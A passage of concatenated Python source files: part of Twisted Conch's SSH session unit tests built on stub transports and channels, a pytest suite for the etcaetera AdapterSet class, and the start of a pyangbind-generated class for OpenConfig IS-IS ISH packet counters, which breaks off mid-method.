a Window newline (CR LF) appended to it. If a null byte is in the data,
disconnect. When we are asked to disconnect, disconnect the
C{ProcessProtocol} with a 0 exit code.
@ivar proto: the C{ProcessProtocol} connected to us.
@ivar data: a C{str} of data written to us.
"""
def __init__(self, processProtocol):
"""
Initialize our instance variables.
@param processProtocol: a C{ProcessProtocol} to connect to ourself.
"""
self.proto = processProtocol
self.closed = False
self.data = ''
processProtocol.makeConnection(self)
def write(self, data):
"""
We got some data. Give it back to our C{ProcessProtocol} with
a newline attached. Disconnect if there's a null byte.
"""
self.data += data
self.proto.outReceived(data)
self.proto.outReceived('\r\n')
if '\x00' in data: # mimic 'exit' for the shell test
self.loseConnection()
def loseConnection(self):
"""
If we're asked to disconnect (and we haven't already) shut down
the C{ProcessProtocol} with a 0 exit code.
"""
if self.closed:
return
self.closed = 1
self.proto.inConnectionLost()
self.proto.outConnectionLost()
self.proto.errConnectionLost()
self.proto.processEnded(failure.Failure(
error.ProcessTerminated(0, None, None)))
class MockProtocol(protocol.Protocol):
"""
A sample Protocol which stores the data passed to it.
@ivar packetData: a C{str} of data to be sent when the connection is made.
@ivar data: a C{str} of the data passed to us.
@ivar open: True if the channel is open.
@ivar reason: if not None, the reason the protocol was closed.
"""
packetData = ''
def connectionMade(self):
"""
Set up the instance variables. If we have any packetData, send it
along.
"""
self.data = ''
self.open = True
self.reason = None
if self.packetData:
self.dataReceived(self.packetData)
def dataReceived(self, data):
"""
Store the received data and write it back with a tilde appended.
The tilde is appended so that the tests can verify that we processed
the data.
"""
self.data += data
if self.transport is not None:
self.transport.write(data + '~')
def connectionLost(self, reason):
"""
Close the protocol and store the reason.
"""
self.open = False
self.reason = reason
class StubConnection(object):
"""
A stub for twisted.conch.ssh.connection.SSHConnection. Record the data
that channels send, and when they try to close the connection.
@ivar data: a C{dict} mapping C{SSHChannel}s to a C{list} of C{str} of data
they sent.
@ivar extData: a C{dict} mapping L{SSHChannel}s to a C{list} of C{tuple} of
(C{int}, C{str}) of extended data they sent.
@ivar requests: a C{dict} mapping L{SSHChannel}s to a C{list} of C{tuple}
of (C{str}, C{str}) of channel requests they made.
@ivar eofs: a C{dict} mapping L{SSHChannel}s to C{true} if they have sent
an EOF.
@ivar closes: a C{dict} mapping L{SSHChannel}s to C{true} if they have sent
a close.
"""
def __init__(self):
"""
Initialize our instance variables.
"""
self.data = {}
self.extData = {}
self.requests = {}
self.eofs = {}
self.closes = {}
def logPrefix(self):
"""
Return our logging prefix.
"""
return "MockConnection"
def sendData(self, channel, data):
"""
Record the sent data.
"""
self.data.setdefault(channel, []).append(data)
def sendExtendedData(self, channel, type, data):
"""
Record the sent extended data.
"""
self.extData.setdefault(channel, []).append((type, data))
def sendRequest(self, channel, request, data, wantReply=False):
"""
Record the sent channel request.
"""
self.requests.setdefault(channel, []).append((request, data,
wantReply))
if wantReply:
return defer.succeed(None)
def sendEOF(self, channel):
"""
Record the sent EOF.
"""
self.eofs[channel] = True
def sendClose(self, channel):
"""
Record the sent close.
"""
self.closes[channel] = True
class StubTransport:
"""
A stub transport which records the data written.
@ivar buf: the data sent to the transport.
@type buf: C{str}
@ivar close: flags indicating if the transport has been closed.
@type close: C{bool}
"""
buf = ''
close = False
def write(self, data):
"""
Record data in the buffer.
"""
self.buf += data
def loseConnection(self):
"""
Note that the connection was closed.
"""
self.close = True
class StubTransportWithWriteErr(StubTransport):
"""
A version of StubTransport which records the error data sent to it.
@ivar err: the extended data sent to the transport.
@type err: C{str}
"""
err = ''
def writeErr(self, data):
"""
Record the extended data in the buffer. This was an old interface
that allowed the Transports from ISession.openShell() or
ISession.execCommand() to receive extended data from the client.
"""
self.err += data
class StubClient(object):
"""
A stub class representing the client to a SSHSession.
@ivar transport: A L{StubTransport} object which keeps track of the data
passed to it.
"""
def __init__(self):
self.transport = StubTransportWithWriteErr()
class SessionInterfaceTestCase(unittest.TestCase):
"""
Tests for the SSHSession class interface. This interface is not ideal, but
it is tested in order to maintain backwards compatibility.
"""
def setUp(self):
"""
Make an SSHSession object to test. Give the channel some window
so that it's allowed to send packets. 500 and 100 are arbitrary
values.
"""
self.session = session.SSHSession(remoteWindow=500,
remoteMaxPacket=100, conn=StubConnection(),
avatar=StubAvatar())
def assertSessionIsStubSession(self):
"""
Asserts that self.session.session is an instance of
StubSessionForStubOldAvatar.
"""
self.assertIsInstance(self.session.session,
StubSessionForStubAvatar)
def test_init(self):
"""
SSHSession initializes its buffer (buf), client, and ISession adapter.
The avatar should not need to be adaptable to an ISession immediately.
"""
s = session.SSHSession(avatar=object) # use object because it doesn't
# have an adapter
self.assertEquals(s.buf, '')
self.assertIdentical(s.client, None)
self.assertIdentical(s.session, None)
def test_client_dataReceived(self):
"""
SSHSession.dataReceived() passes data along to a client. If the data
comes before there is a client, the data should be discarded.
"""
self.session.dataReceived('1')
self.session.client = StubClient()
self.session.dataReceived('2')
self.assertEquals(self.session.client.transport.buf, '2')
def test_client_extReceived(self):
"""
SSHSession.extReceived() passed data of type EXTENDED_DATA_STDERR along
to the client. If the data comes before there is a client, or if the
data is not of type EXTENDED_DATA_STDERR, it is discared.
"""
self.session.extReceived(connection.EXTENDED_DATA_STDERR, '1')
self.session.extReceived(255, '2') # 255 is arbitrary
self.session.client = StubClient()
self.session.extReceived(connection.EXTENDED_DATA_STDERR, '3')
self.assertEquals(self.session.client.transport.err, '3')
def test_client_extReceivedWithoutWriteErr(self):
"""
SSHSession.extReceived() should handle the case where the transport
on the client doesn't have a writeErr method.
"""
client = self.session.client = StubClient()
client.transport = StubTransport() # doesn't have writeErr
# should not raise an error
self.session.extReceived(connection.EXTENDED_DATA_STDERR, 'ignored')
def test_client_closed(self):
"""
SSHSession.closed() should tell the transport connected to the client
that the connection was lost.
"""
self.session.client = StubClient()
self.session.closed()
self.assertTrue(self.session.client.transport.close)
self.session.client.transport.close = False
def test_badSubsystemDoesNotCreateClient(self):
"""
When a subsystem request fails, SSHSession.client should not be set.
"""
ret = self.session.requestReceived(
'subsystem', common.NS('BadSubsystem'))
self.assertFalse(ret)
self.assertIdentical(self.session.client, None)
def test_lookupSubsystem(self):
"""
When a client requests a subsystem, the SSHSession object should get
the subsystem by calling avatar.lookupSubsystem, and attach it as
the client.
"""
ret = self.session.requestReceived(
'subsystem', common.NS('TestSubsystem') + 'data')
self.assertTrue(ret)
self.assertIsInstance(self.session.client, protocol.ProcessProtocol)
self.assertIdentical(self.session.client.transport.proto,
self.session.avatar.subsystem)
def test_lookupSubsystemDoesNotNeedISession(self):
"""
Previously, if one only wanted to implement a subsystem, an ISession
adapter wasn't needed because subsystems were looked up using the
lookupSubsystem method on the avatar.
"""
s = session.SSHSession(avatar=SubsystemOnlyAvatar(),
conn=StubConnection())
ret = s.request_subsystem(
common.NS('subsystem') + 'data')
self.assertTrue(ret)
self.assertNotIdentical(s.client, None)
self.assertIdentical(s.conn.closes.get(s), None)
s.eofReceived()
self.assertTrue(s.conn.closes.get(s))
# these should not raise errors
s.loseConnection()
s.closed()
def test_lookupSubsystem_data(self):
"""
After having looked up a subsystem, data should be passed along to the
client. Additionally, subsystems were passed the entire request packet
as data, instead of just the additional data.
We check for the additional tidle to verify that the data passed
through the client.
"""
#self.session.dataReceived('1')
# subsystems didn't get extended data
#self.session.extReceived(connection.EXTENDED_DATA_STDERR, '2')
self.session.requestReceived('subsystem',
common.NS('TestSubsystem') + 'data')
self.assertEquals(self.session.conn.data[self.session],
['\x00\x00\x00\x0dTestSubsystemdata~'])
self.session.dataReceived('more data')
self.assertEquals(self.session.conn.data[self.session][-1],
'more data~')
def test_lookupSubsystem_closeReceived(self):
"""
SSHSession.closeReceived() should sent a close message to the remote
side.
"""
self.session.requestReceived('subsystem',
common.NS('TestSubsystem') + 'data')
self.session.closeReceived()
self.assertTrue(self.session.conn.closes[self.session])
def assertRequestRaisedRuntimeError(self):
"""
Assert that the request we just made raised a RuntimeError (and only a
RuntimeError).
"""
errors = self.flushLoggedErrors(RuntimeError)
self.assertEquals(len(errors), 1, "Multiple RuntimeErrors raised: %s" %
'\n'.join([repr(error) for error in errors]))
errors[0].trap(RuntimeError)
def test_requestShell(self):
"""
When a client requests a shell, the SSHSession object should get
the shell by getting an ISession adapter for the avatar, then
calling openShell() with a ProcessProtocol to attach.
"""
# gets a shell the first time
ret = self.session.requestReceived('shell', '')
self.assertTrue(ret)
self.assertSessionIsStubSession()
self.assertIsInstance(self.session.client,
session.SSHSessionProcessProtocol)
self.assertIdentical(self.session.session.shellProtocol,
self.session.client)
# doesn't get a shell the second time
self.assertFalse(self.session.requestReceived('shell', ''))
self.assertRequestRaisedRuntimeError()
def test_requestShellWithData(self):
"""
When a client executes a shell, it should be able to give pass data
back and forth between the local and the remote side.
"""
ret = self.session.requestReceived('shell', '')
self.assertTrue(ret)
self.assertSessionIsStubSession()
self.session.dataReceived('some data\x00')
self.assertEquals(self.session.session.shellTransport.data,
'some data\x00')
self.assertEquals(self.session.conn.data[self.session],
['some data\x00', '\r\n'])
self.assertTrue(self.session.session.shellTransport.closed)
self.assertEquals(self.session.conn.requests[self.session],
[('exit-status', '\x00\x00\x00\x00', False)])
def test_requestExec(self):
"""
When a client requests a command, the SSHSession object should get
the command by getting an ISession adapter for the avatar, then
calling execCommand with a ProcessProtocol to attach and the
command line.
"""
ret = self.session.requestReceived('exec',
common.NS('failure'))
self.assertFalse(ret)
self.assertRequestRaisedRuntimeError()
self.assertIdentical(self.session.client, None)
self.assertTrue(self.session.requestReceived('exec',
common.NS('success')))
self.assertSessionIsStubSession()
self.assertIsInstance(self.session.client,
session.SSHSessionProcessProtocol)
self.assertIdentical(self.session.session.execProtocol,
self.session.client)
self.assertEquals(self.session.session.execCommandLine,
'success')
def test_requestExecWithData(self):
"""
When a client executes a command, it should be able to give pass data
back and forth.
"""
ret = self.session.requestReceived('exec',
common.NS('repeat hello'))
self.assertTrue(ret)
self.assertSessionIsStubSession()
self.session.dataReceived('some data')
self.assertEquals(self.session.session.execTransport.data, 'some data')
self.assertEquals(self.session.conn.data[self.session],
['hello', 'some data', '\r\n'])
self.session.eofReceived()
self.session.closeReceived()
self.session.closed()
self.assertTrue(self.session.session.execTransport.closed)
self.assertEquals(self.session.conn.requests[self.session],
[('exit-status', '\x00\x00\x00\x00', False)])
def test_requestPty(self):
"""
When a client requests a PTY, the SSHSession object should make
the request by getting an ISession adapter for the avatar, then
calling getPty with the terminal type, the window size, and any modes
the client gave us.
"""
# 'bad' terminal type fails
ret = self.session.requestReceived(
'pty_req', session.packRequest_pty_req(
'bad', (1, 2, 3, 4), ''))
self.assertFalse(ret)
self.assertSessionIsStubSession()
self.assertRequestRaisedRuntimeError()
# 'good' terminal type succeeds
self.assertTrue(self.session.requestReceived('pty_req',
session.packRequest_pty_req('good', (1, 2, 3, 4), '')))
self.assertEquals(self.session.session.ptyRequest,
('good', (1, 2, 3, 4), []))
def test_requestWindowChange(self):
"""
When the client requests to change the window size, the SSHSession
object should make the request by getting an ISession adapter for the
avatar, then calling windowChanged with the new window size.
"""
ret = self.session.requestReceived(
'window_change',
session.packRequest_window_change((0, 0, 0, 0)))
self.assertFalse(ret)
self.assertRequestRaisedRuntimeError()
self.assertSessionIsStubSession()
self.assertTrue(self.session.requestReceived('window_change',
session.packRequest_window_change((1, 2, 3, 4))))
self.assertEquals(self.session.session.windowChange,
(1, 2, 3, 4))
def test_eofReceived(self):
"""
When an EOF is received and a ISession adapter is present, it should
be notified of the EOF message.
"""
self.session.session = session.ISession(self.session.avatar)
self.session.eofReceived()
self.assertTrue(self.session.session.gotEOF)
def test_closeReceived(self):
"""
When a close is received, the session should send a close message.
"""
ret = self.session.closeReceived()
self.assertIdentical(ret, None)
self.assertTrue(self.session.conn.closes[self.session])
def test_closed(self):
"""
When a close is received and a ISession adapter is present, it should
be notified of the close message.
"""
self.session.session = session.ISession(self.session.avatar)
self.session.closed()
self.assertTrue(self.session.session.gotClosed)
class SessionWithNoAvatarTestCase(unittest.TestCase):
"""
Test for the SSHSession interface. Several of the methods (request_shell,
request_exec, request_pty_req, request_window_change) would create a
'session' instance variable from the avatar if one didn't exist when they
were called.
"""
def setUp(self):
self.session = session.SSHSession()
self.session.avatar = StubAvatar()
self.assertIdentical(self.session.session, None)
def assertSessionProvidesISession(self):
"""
self.session.session should provide I{ISession}.
"""
self.assertTrue(session.ISession.providedBy(self.session.session),
"ISession not provided by %r" % self.session.session)
def test_requestShellGetsSession(self):
"""
If an ISession adapter isn't already present, request_shell should get
one.
"""
self.session.requestReceived('shell', '')
self.assertSessionProvidesISession()
def test_requestExecGetsSession(self):
"""
If an ISession adapter isn't already present, request_exec should get
one.
"""
self.session.requestReceived('exec',
common.NS('success'))
self.assertSessionProvidesISession()
def test_requestPtyReqGetsSession(self):
"""
If an ISession adapter isn't already present, request_pty_req should
get one.
"""
self.session.requestReceived('pty_req',
session.packRequest_pty_req(
'term', (0, 0, 0, 0), ''))
self.assertSessionProvidesISession()
def test_requestWindowChangeGetsSession(self):
"""
If an ISession adapter isn't already present, request_window_change
should get one.
"""
self.session.requestReceived(
'window_change',
session.packRequest_window_change(
(1, 1, 1, 1)))
self.assertSessionProvidesISession()
class WrappersTestCase(unittest.TestCase):
"""
A test for the wrapProtocol and wrapProcessProtocol functions.
"""
def test_wrapProtocol(self):
"""
L{wrapProtocol}, when passed a L{Protocol} should return something that
has write(), writeSequence(), loseConnection() methods which call the
Protocol's dataReceived() and connectionLost() methods, respectively.
"""
protocol = MockProtocol()
protocol.transport = StubTransport()
protocol.connectionMade()
wrapped = session.wrapProtocol(protocol)
wrapped.dataReceived('dataReceived')
self.assertEquals(protocol.transport.buf, 'dataReceived')
wrapped.write('data')
wrapped.writeSequence(['1', '2'])
wrapped.loseConnection()
self.assertEquals(protocol.data, 'data12')
protocol.reason.trap(error.ConnectionDone)
def test_wrapProcessProtocol_Protocol(self):
"""
L{wrapPRocessProtocol}, when passed a L{Protocol} should return
something that follows the L{IProcessProtocol} interface, with
connectionMade() mapping to connectionMade(), outReceived() mapping to
dataReceived() and processEnded() mapping to connectionLost().
"""
protocol = MockProtocol()
protocol.transport = StubTransport()
process_protocol = session.wrapProcessProtocol(protocol)
process_protocol.connectionMade()
process_protocol.outReceived('data')
self.assertEquals(protocol.transport.buf, 'data~')
process_protocol.processEnded(failure.Failure(
error.ProcessTerminated(0, None, None)))
protocol.reason.trap(error.ProcessTerminated)
class TestHelpers(unittest.TestCase):
"""
Tests for the 4 helper functions: parseRequest_* and packRequest_*.
"""
def test_parseRequest_pty_req(self):
"""
The payload of a pty-req message is::
string terminal
uint32 columns
uint32 rows
uint32 x pixels
uint32 y pixels
string modes
Modes are::
byte mode number
uint32 mode value
"""
self.assertEquals(session.parseRequest_pty_req(common.NS('xterm') +
struct.pack('>4L',
1, 2, 3, 4)
+ common.NS(
struct.pack('>BL', 5, 6))),
('xterm', (2, 1, 3, 4), [(5, 6)]))
def test_packRequest_pty_req_old(self):
"""
See test_parseRequest_pty_req for the payload format.
"""
packed = session.packRequest_pty_req('xterm', (2, 1, 3, 4),
'\x05\x00\x00\x00\x06')
self.assertEquals(packed,
common.NS('xterm') + struct.pack('>4L', 1, 2, 3, 4) +
common.NS(struct.pack('>BL', 5, 6)))
def test_packRequest_pty_req(self):
"""
See test_parseRequest_pty_req for the payload format.
"""
packed = session.packRequest_pty_req('xterm', (2, 1, 3, 4),
'\x05\x00\x00\x00\x06')
self.assertEquals(packed,
common.NS('xterm') + struct.pack('>4L', 1, 2, 3, 4) +
common.NS(struct.pack('>BL', 5, 6)))
def test_parseRequest_window_change(self):
"""
The payload of a window_change request is::
uint32 columns
uint32 rows
uint32 x pixels
uint32 y pixels
parseRequest_window_change() returns (rows, columns, x pixels,
y pixels).
"""
self.assertEquals(session.parseRequest_window_change(
struct.pack('>4L', 1, 2, 3, 4)), (2, 1, 3, 4))
def test_packRequest_window_change(self):
"""
See test_parseRequest_window_change for the payload format.
"""
self.assertEquals(session.packRequest_window_change((2, 1, 3, 4)),
struct.pack('>4L', 1, 2, 3, 4))
class SSHSessionProcessProtocolTestCase(unittest.TestCase):
"""
Tests for L{SSHSessionProcessProtocol}.
"""
def setUp(self):
self.session = session.SSHSession(
conn=StubConnection(), remoteWindow=500, remoteMaxPacket=100)
self.transport = StubTransport()
self.pp = session.SSHSessionProcessProtocol(self.session)
self.pp.makeConnection(self.transport)
def assertSessionClosed(self):
"""
Assert that C{self.session} is closed.
"""
self.assertTrue(self.session.conn.closes[self.session])
def assertRequestsEqual(self, expectedRequests):
"""
Assert that C{self.session} has sent the C{expectedRequests}.
"""
self.assertEqual(
self.session.conn.requests[self.session],
expectedRequests)
def test_init(self):
"""
SSHSessionProcessProtocol should set self.session to the session passed
to the __init__ method.
"""
self.assertEquals(self.pp.session, self.session)
def test_connectionMade(self):
"""
SSHSessionProcessProtocol.connectionMade() should check if there's a
'buf' attribute on its session and write it to the transport if so.
"""
self.session.buf = 'buffer'
self.pp.connectionMade()
self.assertEquals(self.transport.buf, 'buffer')
def test_getSignalName(self):
"""
_getSignalName should return the name of a signal when given the
signal number.
"""
for signalName in session.SUPPORTED_SIGNALS:
signalName = 'SIG' + signalName
signalValue = getattr(signal, signalName)
sshName = self.pp._getSignalName(signalValue)
self.assertEquals(sshName, signalName,
"%i: %s != %s" % (signalValue, sshName,
signalName))
def test_getSignalNameWithLocalSignal(self):
"""
If there are signals in the signal module which aren't in the SSH RFC,
we map their name to [signal name]@[platform].
"""
signal.SIGTwistedTest = signal.NSIG + 1 # value can't exist normally
# Force reinitialization of signals
self.pp._signalValuesToNames = None
self.assertEquals(self.pp._getSignalName(signal.SIGTwistedTest),
'SIGTwistedTest@' + sys.platform)
if getattr(signal, 'SIGALRM', None) is None:
test_getSignalName.skip = test_getSignalNameWithLocalSignal.skip = \
"Not all signals available"
def test_outReceived(self):
"""
When data is passed to the outReceived method, it should be sent to
the session's write method.
"""
self.pp.outReceived('test data')
self.assertEquals(self.session.conn.data[self.session],
['test data'])
def test_write(self):
"""
When data is passed to the write method, it should be sent to the
session channel's write method.
"""
self.pp.write('test data')
self.assertEquals(self.session.conn.data[self.session],
['test data'])
def test_writeSequence(self):
"""
When a sequence is passed to the writeSequence method, it should be
joined together and sent to the session channel's write method.
"""
self.pp.writeSequence(['test ', 'data'])
self.assertEquals(self.session.conn.data[self.session],
['test data'])
def test_errReceived(self):
"""
When data is passed to the errReceived method, it should be sent to
the session's writeExtended method.
"""
self.pp.errReceived('test data')
self.assertEquals(self.session.conn.extData[self.session],
[(1, 'test data')])
def test_inConnectionLost(self):
"""
When inConnectionLost is called, it should send an EOF message,
"""
self.pp.inConnectionLost()
self.assertTrue(self.session.conn.eofs[self.session])
def test_loseConnection(self):
"""
When loseConnection() is called, it should call loseConnection
on the session channel.
"""
self.pp.loseConnection()
self.assertTrue(self.session.conn.closes[self.session])
def test_connectionLost(self):
"""
When connectionLost() is called, it should call loseConnection()
on the session channel.
"""
self.pp.connectionLost(failure.Failure(
ProcessDone(0)))
def test_processEndedWithExitCode(self):
"""
When processEnded is called, if there is an exit code in the reason
it should be sent in an exit-status method. The connection should be
closed.
"""
self.pp.processEnded(Failure(ProcessDone(None)))
self.assertRequestsEqual(
[('exit-status', struct.pack('>I', 0) , False)])
self.assertSessionClosed()
def test_processEndedWithExitSignalCoreDump(self):
"""
When processEnded is called, if there is an exit signal in the reason
it should be sent in an exit-signal message. The connection should be
closed.
"""
self.pp.processEnded(
Failure(ProcessTerminated(1,
signal.SIGTERM, 1 << 7))) # 7th bit means core dumped
self.assertRequestsEqual(
[('exit-signal',
common.NS('TERM') # signal name
+ '\x01' # core dumped is true
+ common.NS('') # error message
+ common.NS(''), # language tag
False)])
self.assertSessionClosed()
def test_processEndedWithExitSignalNoCoreDump(self):
"""
When processEnded is called, if there is an exit signal in the
reason it should be sent in an exit-signal message. If no
core was dumped, don't set the core-dump bit.
"""
self.pp.processEnded(
Failure(ProcessTerminated(1, signal.SIGTERM, 0)))
# see comments in test_processEndedWithExitSignalCoreDump for the
# meaning of the parts in the request
self.assertRequestsEqual(
[('exit-signal', common.NS('TERM') + '\x00' + common.NS('') +
common.NS(''), False)])
self.assertSessionClosed()
if getattr(os, 'WCOREDUMP', None) is None:
skipMsg = "can't run this w/o os.WCOREDUMP"
test_processEndedWithExitSignalCoreDump.skip = skipMsg
test_processEndedWithExitSignalNoCoreDump.skip = skipMsg
class SSHSessionClientTestCase(unittest.TestCase):
"""
SSHSessionClient is an obsolete class used to connect standard IO to
an SSHSession.
"""
def test_dataReceived(self):
"""
When data is received, it should be sent to the transport.
"""
client = session.SSHSessionClient()
client.transport = StubTransport()
client.dataReceived('test data')
self.assertEquals(client.transport.buf, 'test data')
|
|
import pytest
from etcaetera.adapter import *
class TestAdapterSet:
def test_set_defaults_to_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.defaults = 123
def test_set_overrides_to_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.defaults = "123"
def test_setitem_using_a_defaults_pointing_other_than_first_index_raises(self):
s = AdapterSet(Env(), Overrides())
with pytest.raises(IndexError):
s[1] = Defaults()
def test_setitem_using_an_overrides_pointing_other_than_last_index_raises(self):
s = AdapterSet(Defaults(), Env())
with pytest.raises(IndexError):
s[0] = Overrides()
def test__set_defaults_with_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.defaults = 123
def test__set_defaults_of_empty_adapters_set(self):
s = AdapterSet()
s.defaults = Defaults()
assert isinstance(s[0], Defaults) is True
def test__set_defaults_of_non_empty_adapters_set_puts_it_first(self):
s = AdapterSet(Env())
s.defaults = Defaults()
assert isinstance(s[0], Defaults) is True
def test__set_defaults_using_a_dict(self):
s = AdapterSet(Env())
s.defaults = {"abc": "123"}
assert isinstance(s[0], Defaults) is True
assert isinstance(s.defaults, Defaults) is True
assert s.defaults.data == {"ABC": "123"}
def test__set_overrides_with_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.overrides = 123
def test__set_overrides_of_empty_adapters_set(self):
s = AdapterSet()
s.overrides = Overrides()
assert isinstance(s[0], Overrides) is True
def test__set_overrides_of_non_empty_adapters_set_puts_it_last(self):
s = AdapterSet(Env())
s.overrides = Overrides()
assert isinstance(s[1], Overrides) is True
def test__set_overrides_using_a_dict(self):
s = AdapterSet(Env())
s.overrides = {"abc": "123"}
assert isinstance(s[1], Overrides) is True
assert isinstance(s.overrides, Overrides) is True
assert s.overrides.data == {"ABC": "123"}
def test_init_with_invalid_adapters_raises(self):
with pytest.raises(TypeError):
AdapterSet(123, "abc")
def test_init_with_defaults_not_being_first_raises(self):
defaults_adapter = Defaults({"abc": "123"})
env_adapter = Env()
with pytest.raises(ValueError):
AdapterSet(env_adapter, defaults_adapter)
def test_init_with_multiple_defaults_raises(self):
defaults_adapter = Defaults({"abc": "123"})
with pytest.raises(ValueError):
AdapterSet(defaults_adapter, defaults_adapter)
def test_init_with_overrides_not_being_last_raises(self):
overrides_adapter = Overrides({"abc": "123"})
env_adapter = Env()
with pytest.raises(ValueError):
AdapterSet(overrides_adapter, env_adapter)
def test_init_with_multiple_overrides_raises(self):
overrides_adapter = Overrides({"abc": "123"})
with pytest.raises(ValueError):
AdapterSet(overrides_adapter, overrides_adapter)
def test_init_adapters_order_is_protected(self):
first_env_adapter = Env()
second_env_adapter = Env()
defaults_adapter = Defaults()
overrides_adapter = Overrides()
s = AdapterSet(
defaults_adapter,
first_env_adapter,
second_env_adapter,
overrides_adapter
)
assert len(s) == 4
assert isinstance(s[0], Defaults) and s[0] == defaults_adapter
assert isinstance(s[1], Env) and s[1] == first_env_adapter
assert isinstance(s[2], Env) and s[2] == second_env_adapter
assert isinstance(s[3], Overrides) and s[3] == overrides_adapter
def test_appendleft_raises_when_provided_with_non_adapter(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.appendleft(123)
def test_appendleft_raises_when_providing_a_second_defaults(self):
s = AdapterSet(Defaults())
with pytest.raises(ValueError):
s.appendleft(Defaults())
def test_appendleft_raises_when_providing_a_second_overrides(self):
s = AdapterSet(Overrides())
with pytest.raises(ValueError):
s.appendleft(Overrides())
def test_appendleft_sets_defaults_property(self):
s = AdapterSet(Env(), Env())
assert s.defaults is None
s.appendleft(Defaults())
assert s.defaults is not None
def test_appendleft_sets_defaults_overrides(self):
s = AdapterSet(Env(), Env())
assert s.overrides is None
s.appendleft(Overrides())
assert s.overrides is not None
def test_append_raises_when_provided_with_non_adapter(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.append(123)
def test_append_raises_when_providing_a_second_defaults(self):
s = AdapterSet(Defaults())
with pytest.raises(ValueError):
s.append(Defaults())
def test_append_raises_when_providing_a_second_overrides(self):
s = AdapterSet(Overrides())
with pytest.raises(ValueError):
s.append(Overrides())
def test_append_sets_defaults_property(self):
s = AdapterSet(Env(), Env())
assert s.defaults is None
s.append(Defaults())
assert s.defaults is not None
def test_append_sets_overrides_property(self):
s = AdapterSet(Env(), Env())
assert s.overrides is None
s.append(Overrides())
assert s.overrides is not None
def test_insert_at_negative_index_raises(self):
s = AdapterSet()
with pytest.raises(IndexError):
s.insert(-1, Env())
def test_insert_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.insert(0, 123)
def test_insert_a_second_defaults_at_first_index_raises(self):
s = AdapterSet(Defaults())
with pytest.raises(ValueError):
s.insert(0, Defaults())
def test_insert_a_second_overrides_at_last_index_raises(self):
s = AdapterSet(Defaults(), Env(), Overrides())
with pytest.raises(ValueError):
s.insert(3, Overrides())
def test_insert_in_the_middle(self):
s = AdapterSet(Defaults(), Overrides())
s.insert(1, Env())
assert len(s) == 3
assert isinstance(s[1], Env)
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/levels/level/packet-counters/ish/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state relating to ISH PDUs.
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__received",
"__processed",
"__dropped",
"__sent",
"__retransmit",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"levels",
"level",
"packet-counters",
"ish",
"state",
]
def _get_received(self):
"""
Getter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface.
"""
return self.__received
def _set_received(self, v, load=False):
"""
